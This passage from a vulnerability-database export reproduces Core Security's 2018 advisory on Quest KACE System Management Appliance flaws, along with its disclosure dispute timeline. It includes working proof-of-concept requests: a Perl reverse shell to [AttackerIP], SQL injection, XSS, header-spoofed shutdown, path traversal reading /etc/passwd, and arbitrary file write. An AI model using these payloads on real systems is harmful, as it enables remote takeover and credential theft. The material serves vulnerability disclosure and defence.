"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Quest KACE System Management Appliance command injection vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/131205"
},
{
"title": "Quest KACE System Management Appliance Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81227"
},
{
"title": "lean0x2f.github.io",
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.590000",
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE Systems Management Appliance Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
],
"trust": 0.6
}
}
VAR-201805-0597
Vulnerability from variot - Updated: 2023-12-18 12:01 The 'checksum' parameter of the '/common/download_attachment.php' script in the Quest KACE System Management Appliance 8.0.318 can be abused to read arbitrary files with 'www' privileges via Directory Traversal. No administrator privileges are needed to execute this script. Quest KACE Systems Management Appliance contains a path traversal vulnerability. Information may be obtained. Quest KACE System Management Appliance is an IT asset management device from Quest Software, USA. A path traversal vulnerability exists in the Quest KACE System Management Appliance 8.0.318 release. Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0.318 (the version tested; see the X-KACE-Version response headers in section 7)
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
- platform: indicates the platform on which the agent is going to be installed
- serv: SHA256 hash of a fixed value that depends on each appliance
- orgid: Organization ID
- version: version number of the agent
The last two parameters (Organization ID and Agent version) are simple to obtain. The Agent versions are publicly available on the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time-based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that require higher privileges, the application relies on a message queue manager that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] The 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are meant to be accessible only from localhost. That restriction is enforced on the 'Host' and 'X-Forwarded-For' HTTP headers, both of which are attacker-controlled, so it can be bypassed by setting them to local values (note the 'Host: localhost' and 'X-Forwarded-For: ::1' headers in the request below). A localhost-only check must be based on the actual peer address of the connection, never on request headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection; specifically, a blind, time-based SQL injection that is reachable without authentication.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection; specifically, an error-based SQL injection (the request below carries a session cookie, so this one is authenticated).
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross-Site Scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Directory traversal in download_attachment.php
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges via directory traversal; no administrator privileges are needed to reach this script. The following proof of concept reads the '/etc/passwd' file.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Arbitrary file write and delete via path traversal in advisory.php
The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' through a traversal sequence in the 'IMAGES_JSON' parameter of '/adminui/advisory.php'. The file content is sent base64-encoded in the payload; 'VGVzdENvbnRlbnQ=' decodes to 'TestContent', which matches the 11-byte file in the listing below (the original advisory text refers to the content as 'Sarasa'). Files can be written to any location where the 'www' user has write permissions.
File deletion could be abused to delete the '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence determines whether the appliance setup wizard is shown, so removing it would cause the initial setup wizard to be presented again.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline
2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form.
2018-03-05: Quest Support confirmed the receipt and requested additional information.
2018-03-12: Core Security sent a draft advisory including a technical description.
2018-03-16: Quest Support asked for the CVE-IDs.
2018-03-16: Core Security answered saying that the CVE-IDs are requested once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel, also copying the researchers behind this discovery.
2018-03-16: Quest Support thanked Core for its reply and stated it would be in touch during the process.
2018-03-20: Quest Support informed Core that they had not yet received any updates from the engineering team and had requested one.
2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information.
2018-03-21: Core replied with the affected version (which was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories.
2018-03-21: Quest Support acknowledged the information provided.
2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and for the level of thoroughness and detail provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified Core that the work done by Core was in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise Quest would take legal action.
2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. 
With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
